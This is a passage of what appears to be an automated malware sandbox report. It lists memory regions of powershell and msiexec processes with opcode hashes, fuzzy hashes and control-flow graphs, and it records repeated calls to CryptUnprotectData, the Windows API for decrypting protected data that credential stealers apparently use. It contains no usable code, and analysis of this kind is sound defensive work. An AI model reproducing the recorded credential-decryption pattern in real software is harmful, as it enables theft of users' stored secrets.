                                                                    • Opcode ID: e4c58a0812deed952a21e5f22a7c7fd0e41fba6b8a9bc1b6544593ef22da9610
                                                                    • Instruction ID: db5971c493345cb805debcca2208f0ab74f84c0bc799e51991246862d3271555
                                                                    • Opcode Fuzzy Hash: e4c58a0812deed952a21e5f22a7c7fd0e41fba6b8a9bc1b6544593ef22da9610
                                                                    • Instruction Fuzzy Hash: D4217CB131175AABE76456B9881873777969FC4709F34C42E9506DF380DDB5C8C0C7A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2349519720.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4826008bf62e091ccf63628e89a470dd982cf5ca708e03bd864ab2a03d3895d2
                                                                    • Instruction ID: a997083e8b0e3e1b6ad25c7965332492edfe37e8995f44f0381b16637b2ddda2
                                                                    • Opcode Fuzzy Hash: 4826008bf62e091ccf63628e89a470dd982cf5ca708e03bd864ab2a03d3895d2
                                                                    • Instruction Fuzzy Hash: FD21A9F23063C9ABE720077648147763FA65FC6709F28809AA541DF2C2DAB9C9C0C372
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2353240116.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_9710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3ecc86e0f4be3f7c7becbc3e4962d9bc91b81376633373cfaa18c8ea58366ce7
                                                                    • Instruction ID: 49c8e8cf9798999d5253ffbe84b516555c26cf9180cbb7dd51fdf6d0173bc129
                                                                    • Opcode Fuzzy Hash: 3ecc86e0f4be3f7c7becbc3e4962d9bc91b81376633373cfaa18c8ea58366ce7
                                                                    • Instruction Fuzzy Hash: B5216D33B04206CFDF25A66DE4512EAF7A5BF95220F2081BBD5D6CB282DB31C80AC351
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2349519720.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5c472ab6310f332713b7f82fb1a414b64876550c089a5a2bed8703f599b8f190
                                                                    • Instruction ID: 875f9051e65cdfa7ecc7eb8317b82e747c02eb0b666cf124de77fd41825be9d8
                                                                    • Opcode Fuzzy Hash: 5c472ab6310f332713b7f82fb1a414b64876550c089a5a2bed8703f599b8f190
                                                                    • Instruction Fuzzy Hash: 1D01F77630021A9BDB1495AAD40467AB7DBDFC5126F14C07FE545C7351D632D885C7A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2353268443.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_9720000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dd50c6e2fa2c21cb2c5ac228123e119efe451d86591c1cc3fbffc9118231c75a
                                                                    • Instruction ID: da8d484264d3c0ac6b6a2084d627dd96c345ef3a8879ed8ee1cf7362cc2abb09
                                                                    • Opcode Fuzzy Hash: dd50c6e2fa2c21cb2c5ac228123e119efe451d86591c1cc3fbffc9118231c75a
                                                                    • Instruction Fuzzy Hash: 20F01736A00119EFCB05DBC8D9409EDF7B6FF88320B658119E915B7260C732AD22CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2349519720.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e693ea532f96b371922d45bda2a3366de9584aebb83e5a5d0da6967e437496f1
                                                                    • Instruction ID: 2220d6bdb27c9243dc974f26d1cf322ef2d33eb311b8b52c584e90a91d330b15
                                                                    • Opcode Fuzzy Hash: e693ea532f96b371922d45bda2a3366de9584aebb83e5a5d0da6967e437496f1
                                                                    • Instruction Fuzzy Hash: 6EE0487230A2D04FC30696749C544567F769FC712432982EBD495CB293C52AC917C761
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2349519720.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7e30000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6036ca7c1fcd566bc247ffc13946f820885d5ac3731f5f1d4421ed898068c2b1
                                                                    • Instruction ID: 3805cf604e674d351535c604afb057312369496d7e1c333b60291c98be5d13b5
                                                                    • Opcode Fuzzy Hash: 6036ca7c1fcd566bc247ffc13946f820885d5ac3731f5f1d4421ed898068c2b1
                                                                    • Instruction Fuzzy Hash: 0BD012EC30062433D934716834367ED1741CB84ED1F0D4119F601ABB80EE655D4543E6
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2353301520.0000000009730000.00000040.00001000.00020000.00000000.sdmp, Offset: 09730000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_9730000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c2710c26df9f16ed18350f7514c31c7acea487c9f6ab7dca94d7f6cf926b0d1
                                                                    • Instruction ID: 0dfb6bc1c2f96af985fba7b9d19fd645d3203bacc3d4423847f32b9472fba420
                                                                    • Opcode Fuzzy Hash: 0c2710c26df9f16ed18350f7514c31c7acea487c9f6ab7dca94d7f6cf926b0d1
                                                                    • Instruction Fuzzy Hash: 8AD05BB181C3D96FC7428A2248156563EF05B162A975504DBC155EA553E216EC029751

                                                                    Execution Graph

                                                                    Execution Coverage:8.2%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:21.4%
                                                                    Total number of Nodes:28
                                                                    Total number of Limit Nodes:2
                                                                    execution_graph 23783 6bced8 23784 6bcee4 23783->23784 23788 27488608 23784->23788 23792 27488602 23784->23792 23785 6bd0b7 23790 2748862a 23788->23790 23789 27488ab9 23789->23785 23790->23789 23796 27488ec1 23790->23796 23794 2748862a 23792->23794 23793 27488ab9 23793->23785 23794->23793 23795 27488ec1 CryptUnprotectData 23794->23795 23795->23794 23797 27488ed0 23796->23797 23801 27489500 23797->23801 23808 27489510 23797->23808 23798 27488f40 23798->23790 23802 27489505 23801->23802 23805 274895e9 23802->23805 23806 27489500 CryptUnprotectData 23802->23806 23807 27489510 CryptUnprotectData 23802->23807 23815 27489350 23805->23815 23806->23805 23807->23805 23809 27489535 23808->23809 23810 274895e9 23808->23810 23809->23810 23813 27489500 CryptUnprotectData 23809->23813 23814 27489510 CryptUnprotectData 23809->23814 23811 27489350 CryptUnprotectData 23810->23811 23812 274897b5 23811->23812 23812->23798 23813->23810 23814->23810 23816 274899a0 CryptUnprotectData 23815->23816 23818 274897b5 23816->23818 23818->23798

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 193 27489999-2748999c 194 2748999e-274899d4 193->194 195 274899d7-27489a12 CryptUnprotectData 193->195 194->195 196 27489a1b-27489a43 195->196 197 27489a14-27489a1a 195->197 197->196
                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 27489A05
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CryptDataUnprotect
                                                                    • String ID:
                                                                    • API String ID: 834300711-0
                                                                    • Opcode ID: 781ed8dc3ed5974bd5a69c797a21f6802b31da02c00bf7b12d25fc4bc1238e0f
                                                                    • Instruction ID: 6e8641e211ee464b11cbe0b5c5066af821b11f40405095b126caf8382a5869e8
                                                                    • Opcode Fuzzy Hash: 781ed8dc3ed5974bd5a69c797a21f6802b31da02c00bf7b12d25fc4bc1238e0f
                                                                    • Instruction Fuzzy Hash: D0116776800249DFDB11CF99C844BEEBFF4EF48320F14841AEA54A7210C379A550CFA1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 202 27489350-27489a12 CryptUnprotectData 205 27489a1b-27489a43 202->205 206 27489a14-27489a1a 202->206 206->205
                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 27489A05
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CryptDataUnprotect
                                                                    • String ID:
                                                                    • API String ID: 834300711-0
                                                                    • Opcode ID: 53e93e9f6a77f90db09f63c68c93bd791333a0d87905f300dab8a6abee4b562b
                                                                    • Instruction ID: 9353d33a421fc27882ed10cc1af96f0c9963cfb12b06fdf2fa32ed877403c9cf
                                                                    • Opcode Fuzzy Hash: 53e93e9f6a77f90db09f63c68c93bd791333a0d87905f300dab8a6abee4b562b
                                                                    • Instruction Fuzzy Hash: AD1126B680064DDFDB10CF99D944BEEBBF4EB48320F14845AE954A7210D379A550CFA5

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 566 6bb328-6bb33b 567 6bb47a-6bb481 566->567 568 6bb341-6bb34a 566->568 569 6bb350-6bb354 568->569 570 6bb484 568->570 571 6bb36e-6bb375 569->571 572 6bb356 569->572 573 6bb489-6bb4b0 570->573 571->567 575 6bb37b-6bb388 571->575 574 6bb359-6bb364 572->574 583 6bb4dc 573->583 584 6bb4b2-6bb4ca 573->584 574->570 576 6bb36a-6bb36c 574->576 575->567 579 6bb38e-6bb3a1 575->579 576->571 576->574 581 6bb3a3 579->581 582 6bb3a6-6bb3ae 579->582 581->582 586 6bb41b-6bb41d 582->586 587 6bb3b0-6bb3b6 582->587 585 6bb4de-6bb4e2 583->585 596 6bb4cc-6bb4d1 584->596 597 6bb4d3-6bb4d6 584->597 586->567 588 6bb41f-6bb425 586->588 587->586 589 6bb3b8-6bb3be 587->589 588->567 591 6bb427-6bb431 588->591 589->573 592 6bb3c4-6bb3dc 589->592 591->573 593 6bb433-6bb44b 591->593 604 6bb409-6bb40c 592->604 605 6bb3de-6bb3e4 592->605 609 6bb44d-6bb453 593->609 610 6bb470-6bb473 593->610 596->585 599 6bb4d8-6bb4da 597->599 600 6bb4e3-6bb4f1 597->600 599->583 599->584 607 6bb54c-6bb54f 600->607 608 6bb4f3-6bb4f5 600->608 604->570 606 6bb40e-6bb411 604->606 605->573 611 6bb3ea-6bb3fe 605->611 606->570 613 6bb413-6bb419 606->613 614 6bb550-6bb551 607->614 608->614 615 6bb4f6-6bb4f9 608->615 609->573 616 6bb455-6bb469 609->616 610->570 612 6bb475-6bb478 610->612 611->573 623 6bb404 611->623 612->567 612->591 613->586 613->587 618 6bb554-6bb604 call 6b3908 call 6b3428 614->618 617 6bb4fb-6bb520 615->617 615->618 616->573 624 6bb46b 616->624 620 6bb522 617->620 621 6bb527-6bb54a 617->621 634 6bb60b-6bb62c call 6b4dc8 618->634 635 6bb606 618->635 620->621 621->607 623->604 624->610 637 6bb631-6bb63c 634->637 635->634 638 6bb63e 637->638 639 6bb643-6bb647 637->639 638->639 640 6bb649-6bb64a 639->640 641 6bb64c-6bb653 639->641 642 6bb66b-6bb6af 640->642 643 6bb65a-6bb668 641->643 644 6bb655 641->644 648 6bb715-6bb72c 642->648 643->642 644->643 650 6bb72e-6bb753 648->650 651 6bb6b1-6bb6c7 648->651 657 6bb76b 650->657 658 6bb755-6bb76a 650->658 655 6bb6c9-6bb6d5 651->655 656 6bb6f1 651->656 659 6bb6df-6bb6e5 655->659 660 6bb6d7-6bb6dd 655->660 661 6bb6f7-6bb714 656->661 658->657 662 6bb6ef 659->662 660->662 661->648 662->661
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 388083d3680b68416bba92f9591c73948a59902546f86e7f8e6d8a2c140b5c61
                                                                    • Instruction ID: b382d0b448dda04c45ed10dcfcc7da25115b1d5bbcaf89db6e9a8e3d9afe33e1
                                                                    • Opcode Fuzzy Hash: 388083d3680b68416bba92f9591c73948a59902546f86e7f8e6d8a2c140b5c61
                                                                    • Instruction Fuzzy Hash: 2BE1FBB5A00218CFDB14CFA9D984ADDBBF2FF49310F159069E805AB366DB709D81CB50

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 775 27488608-27488628 776 2748862a 775->776 777 2748862f-274886f1 775->777 776->777 782 27488aba-27488bb8 777->782 783 274886f7-27488714 777->783 786 27488bba-27488bbf 782->786 787 27488bc0-27488bc6 782->787 834 27488717 call 27451966 783->834 835 27488717 call 27451610 783->835 836 27488717 call 27451620 783->836 786->787 788 2748871c-2748875e 792 27488760 788->792 793 27488765-2748876e 788->793 792->793 794 27488aad-27488ab3 793->794 795 27488ab9 794->795 796 27488773-2748880b 794->796 795->782 801 27488811-2748884d 796->801 802 274888e3-27488944 796->802 837 27488853 call 27488c51 801->837 838 27488853 call 27488ec1 801->838 813 27488945-2748899a 802->813 809 27488859-27488894 811 274888de-274888e1 809->811 812 27488896-274888dd 809->812 811->813 812->811 818 274889a0-27488a90 813->818 819 27488a91-27488aa3 813->819 818->819 821 27488aaa 819->821 822 27488aa5 819->822 821->794 822->821 834->788 835->788 836->788 837->809 838->809
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 404c72517d9fe5bc99e4cdc988dc01f623c70ca9f87179d538433825b5c5ce96
                                                                    • Instruction ID: 17227c881b09063687c157cb28dc444a70f1deb853d7cf0a6b37bcc479a7dea7
                                                                    • Opcode Fuzzy Hash: 404c72517d9fe5bc99e4cdc988dc01f623c70ca9f87179d538433825b5c5ce96
                                                                    • Instruction Fuzzy Hash: B1E1B0B4E01218CFEB64DFA5C854BDDBBB2BF89304F2081AAD409A7391DB355A85CF54
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 525d74b42ee2003068c5abacf218d6dfb2df258ce7bed592c38243cb4ee2b5a5
                                                                    • Instruction ID: 58c86ea33a8737cb25acd604637721d71a8abbb083830b6bce5b2753754676bf
                                                                    • Opcode Fuzzy Hash: 525d74b42ee2003068c5abacf218d6dfb2df258ce7bed592c38243cb4ee2b5a5
                                                                    • Instruction Fuzzy Hash: 6BC19174E00218CFDB54DFA5C994B9DBBB2BF89301F2081AAD809AB355DB359E85CF50

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 911 27450040-27450060 912 27450067-274500bd 911->912 913 27450062 911->913 914 274500c7-274500f8 912->914 913->912 917 274500fe-2745014a 914->917 918 2745044a-2745047c 914->918 924 27450151-2745015a 917->924 925 2745014c 917->925 926 2745043d-27450443 924->926 925->924 927 2745015f-274501d9 926->927 928 27450449 926->928 933 27450295-274502f0 927->933 934 274501df-2745024d 927->934 928->918 945 274502f1-2745033f 933->945 943 27450290-27450293 934->943 944 2745024f-2745028f 934->944 943->945 944->943 950 27450345-27450427 945->950 951 27450428-27450433 945->951 950->951 952 27450435 951->952 953 2745043a 951->953 952->953 953->926
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b1f0d993303705e137b5daffe62a77dca0cada67f83f643feab45b5f8c3e9b3e
                                                                    • Instruction ID: 69a63de3dba8f713433b544a852bdbe02ff0cb70de0c37a58d3a2a37257f425c
                                                                    • Opcode Fuzzy Hash: b1f0d993303705e137b5daffe62a77dca0cada67f83f643feab45b5f8c3e9b3e
                                                                    • Instruction Fuzzy Hash: E7C19174E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dccf5bd9e0e37ce410892e45db1d21ad0ad3892f1022eea9aa614e2f3c14f723
                                                                    • Instruction ID: eae52729bb686ddad381e1b3849343de6ef9408687c7998b820d893e4fba02f1
                                                                    • Opcode Fuzzy Hash: dccf5bd9e0e37ce410892e45db1d21ad0ad3892f1022eea9aa614e2f3c14f723
                                                                    • Instruction Fuzzy Hash: 89C19074E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD409AB395DB359E85CF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 02f9473d227770fd2ea8cfb5e24c0d3267cc87824483aac6681433d47b7d2fc0
                                                                    • Instruction ID: 6855a0b62bdab041c365c78beaee4ca016d04b5a9c5ed7f029f0c29b4bce9e27
                                                                    • Opcode Fuzzy Hash: 02f9473d227770fd2ea8cfb5e24c0d3267cc87824483aac6681433d47b7d2fc0
                                                                    • Instruction Fuzzy Hash: A6A1E070A00218CFEB14DFA9C884BDDBBB1FF89314F208269E459AB391DB749985CF55
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3c80dc46b935931df87db49d23c8fbee8571626abae2c0b9f1ad63ed7dbe8a6a
                                                                    • Instruction ID: 3f423c970bb626679373ffc5f57673677bd689705df50d831da90146aea54043
                                                                    • Opcode Fuzzy Hash: 3c80dc46b935931df87db49d23c8fbee8571626abae2c0b9f1ad63ed7dbe8a6a
                                                                    • Instruction Fuzzy Hash: 2BA1D170900208CFEB24DFA9C884BDDBBB1BF89314F208269E459AB391DB749985CF55
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d92c723c7502f308afac3d91f11237972a626cabc8693429d23f6e435bb4ada7
                                                                    • Instruction ID: f4d6fbc3b34d323f0f64865767414286c979045bda93e48f260e587348ff3df3
                                                                    • Opcode Fuzzy Hash: d92c723c7502f308afac3d91f11237972a626cabc8693429d23f6e435bb4ada7
                                                                    • Instruction Fuzzy Hash: 3E91DF74900218CFEB14DFA8C884BDCBBB1FF89314F209269E459BB291EB749985CF55
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 192c4109eb2193c5b0de5ff73b028cfbe541e46f368d582ae92de1dc2b025663
                                                                    • Instruction ID: a9403bc4c5241291df8bcbf4db1f27f8be90e86f83767733e30086da593a4452
                                                                    • Opcode Fuzzy Hash: 192c4109eb2193c5b0de5ff73b028cfbe541e46f368d582ae92de1dc2b025663
                                                                    • Instruction Fuzzy Hash: 1C81C3B4E00218CFDB54DFA9D984ADDBBF2BF89310F14806AE409AB361DB319985DF10
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 584942db263c2bab9baf881432c319a6a6820128315662c0c8168e2a08712445
                                                                    • Instruction ID: cac529c282576223d9609ee16e50d95a06511508ac91f2a321704ad5b0245b83
                                                                    • Opcode Fuzzy Hash: 584942db263c2bab9baf881432c319a6a6820128315662c0c8168e2a08712445
                                                                    • Instruction Fuzzy Hash: 4481B4B4E00258CFDB54DFA9D984ADDBBF2BF89300F249069E409AB361DB749981DF10
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 46ff01bf4f071587eb219efe36b6adc2ce47f1556e49efdb1dec64afd6cb76a6
                                                                    • Instruction ID: 1b15cbb4f6f568c8f0048120c7c28571ce0f00a82396ad0c3d4295e8e91365c4
                                                                    • Opcode Fuzzy Hash: 46ff01bf4f071587eb219efe36b6adc2ce47f1556e49efdb1dec64afd6cb76a6
                                                                    • Instruction Fuzzy Hash: BC8193B4E00258CFDB54DFA9D984ADDBBF2BF89310F148069E409AB361DB309A81DF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9d392628d2fea473af8b05380f0eb35173115d4db27f2b789dd61a0aa86d67bd
                                                                    • Instruction ID: c4d8b63cd91cf301c1b58606c8c90cc9b1017ca5ea1304f1e8d194e0033901c0
                                                                    • Opcode Fuzzy Hash: 9d392628d2fea473af8b05380f0eb35173115d4db27f2b789dd61a0aa86d67bd
                                                                    • Instruction Fuzzy Hash: 6A81A3B4E00218DFDB14DFA9D984ADDBBF2BF89310F148069E419AB365DB309981DF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c3eb132548383172d05246984f542d53353375c8a6c6c13fbb45dba6e6a0f2c7
                                                                    • Instruction ID: ba418dfb7ce58c0561aee4318efc15ce98b5b175387d15be5d9972aafb6a94f2
                                                                    • Opcode Fuzzy Hash: c3eb132548383172d05246984f542d53353375c8a6c6c13fbb45dba6e6a0f2c7
                                                                    • Instruction Fuzzy Hash: 2B8192B4E01218DFDB54DFA9D984ADDBBF2BF89300F14806AE419AB365DB349981CF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c67369f413b2e33d5fdad3e4b5738a0a4400f1c34b56a5b2bd1819e9f56a0585
                                                                    • Instruction ID: 37e0d4267bdcb22706616d012b97a6adf2fe1fa072ee10f1f6233c120e0bb7ca
                                                                    • Opcode Fuzzy Hash: c67369f413b2e33d5fdad3e4b5738a0a4400f1c34b56a5b2bd1819e9f56a0585
                                                                    • Instruction Fuzzy Hash: 4581A3B5E00218CFDB54DFA9D984ADDBBF2BF89310F149069E419AB361DB309A81CF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 429a02bea7bda973cf55ee5bdb58ed374c50b3e73541945e3054022dcc8ea3e4
                                                                    • Instruction ID: 7b7bc0911dc8faaab2792896cd51371307a3dd773a6ef4d7b52077215c97800e
                                                                    • Opcode Fuzzy Hash: 429a02bea7bda973cf55ee5bdb58ed374c50b3e73541945e3054022dcc8ea3e4
                                                                    • Instruction Fuzzy Hash: 1981A5B4E00218DFEB54DFA9D944ADDBBF2BF89310F148069E419AB365DB309981DF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c60dd6b99b8c0e0791920253588979459ffd0f80e394aaaa96dff4bb2a45f945
                                                                    • Instruction ID: 8f8a1551ee9832d793b81ced5a192dd10b486692e869e94beb6f870cd30c6d92
                                                                    • Opcode Fuzzy Hash: c60dd6b99b8c0e0791920253588979459ffd0f80e394aaaa96dff4bb2a45f945
                                                                    • Instruction Fuzzy Hash: 6A411675D05248CFEB08CFA6D8556DDBBB2FF8A300F20C16AC418AB265EB385946CF51
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd28ac86e1440938d6902c13dfe2eebd8a9cf8d7add1b987d43c806d3556d86e
                                                                    • Instruction ID: 8331ffe6841d54f12492e0b5617af18f0c9a44fdc6b0a296678bfab2626e25b7
                                                                    • Opcode Fuzzy Hash: fd28ac86e1440938d6902c13dfe2eebd8a9cf8d7add1b987d43c806d3556d86e
                                                                    • Instruction Fuzzy Hash: 7C41D170E01658CBDB18CFAAD9906DEFBF2AF99300F20D12AC418AB255DB345946CF54
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7c3b713e4e83a9c6a9c027a82f8907a03986c5d85f9c5b7500f974f208f0f94a
                                                                    • Instruction ID: 375a785f5538d17f48b1b28d87dfc67ec7b61bdfef6a48f324d90ddaec7d6faa
